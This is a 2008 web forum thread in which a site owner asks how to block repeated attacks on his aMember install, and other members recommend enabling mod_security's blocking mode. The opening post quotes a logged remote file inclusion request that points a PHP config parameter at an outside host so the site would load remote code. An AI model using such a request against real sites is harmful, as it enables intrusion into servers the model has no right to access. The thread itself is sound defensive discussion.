homepage Welcome to WebmasterWorld Guest from 54.205.144.54
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member

Visit PubCon.com
Home / Forums Index / Code, Content, and Presentation / Apache Web Server
Forum Library, Charter, Moderators: Ocean10000 & incrediBILL & phranque

Apache Web Server Forum

    
block hack attempts via htaccess?
David_M




msg:3567620
 1:09 pm on Feb 6, 2008 (gmt 0)

I get a ton of hack attempts on my amember system using the following and similar urls:
/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://safe-bx.example.com/test.txt?

Wondering if there's a way to deny site wide access to any url requesting
test.txt using .htaccess

Thanks.

[edited by: jdMorgan at 2:14 pm (utc) on Feb. 6, 2008]
[edit reason] example.com [/edit]

 

wilderness




msg:3567700
 3:10 pm on Feb 6, 2008 (gmt 0)

some recent and similar threads:
[webmasterworld.com...]
[webmasterworld.com...]

Many thanks to Jim.

Frank_Rizzo




msg:3567742
 3:55 pm on Feb 6, 2008 (gmt 0)

A good solution is modsecurity.

It will stop this and attacks you don't already know about.

Easily installs / integrates with apache. Needs a bit of dry run testing at first but once installed you just leave it turn away the bad guys at the door.

David_M




msg:3568239
 4:26 am on Feb 7, 2008 (gmt 0)

Thanks. Installed modsecurity.
Any suggestion on a config for blocking the above?

Frank_Rizzo




msg:3568405
 11:10 am on Feb 7, 2008 (gmt 0)

Modsecurity blocks it from doing what it is trying to do.

Mod security is telling you an exploit attempt was detected and it issued a 500 / 40x error (not that the transmitting end would recognise it as they are fire and forget).

To block it totally from accessing your server you need to deny the ip address but you do not know that before hand as different proxies / compromised devices are being used everytime.

David_M




msg:3568484
 12:55 pm on Feb 7, 2008 (gmt 0)

Its still showing up in my joomla logs, so its not being blocked.

Maybe its related, but I had to turn off SecFilterCheckURLEncoding directive because some of my legit urls use odd characters.

Frank_Rizzo




msg:3568534
 2:18 pm on Feb 7, 2008 (gmt 0)

Out of the box modsecurity is probably set to log mode only. This is where it will record actions in the modsec log file but not actually block.

Look at the modsecurity_crs_10_config.conf file and set

SecRuleEngine On

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Code, Content, and Presentation / Apache Web Server
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved